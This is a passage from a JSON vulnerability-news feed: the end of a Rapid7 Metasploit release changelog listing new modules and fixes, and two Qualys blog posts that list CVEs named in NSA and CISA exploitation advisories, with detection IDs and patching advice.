Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. 
As always, docs improvements are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users both to elevate their privileges on affected versions of Windows and potentially to execute a full end-to-end attack chain from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>) ensures that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). 
Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) on vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property and economic, political, and military information. \n\nHere is the list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along with the affected products and the associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller, Citrix Gateway, Citrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193, CVE-2020-8195, CVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18; Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server versions| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 
\nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for these commonly exploited vulnerabilities. You can search for them in the VMDR Dashboard with the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities with the "Active Attack" RTI:\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.\n\nWith the VMDR Dashboard, you can track the 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of the trend of these vulnerabilities in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploitation one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * An organization's vigilance team should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch these high-priority, commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", 
"CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. 
You can search for these QIDs in the VMDR Dashboard using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065,CVE-2021-22893,CVE-2021-22894,CVE-2021-22899,CVE-2021-22900,CVE-2021-27101,CVE-2021-27102,CVE-2021-27103,CVE-2021-27104,CVE-2021-21985,CVE-2018-13379,CVE-2020-12812,CVE-2019-5591,CVE-2019-19781,CVE-2019-11510,CVE-2020-5902,CVE-2020-15505,CVE-2017-11882,CVE-2019-11580,CVE-2019-18935,CVE-2019-0604,CVE-2020-0787,CVE-2020-1472]_\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities with the \u201cActive Attack\u201d RTI:\n\nWith the VMDR Dashboard, you can track the top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the trend of these vulnerabilities in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance teams should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * 
Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", 
"CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}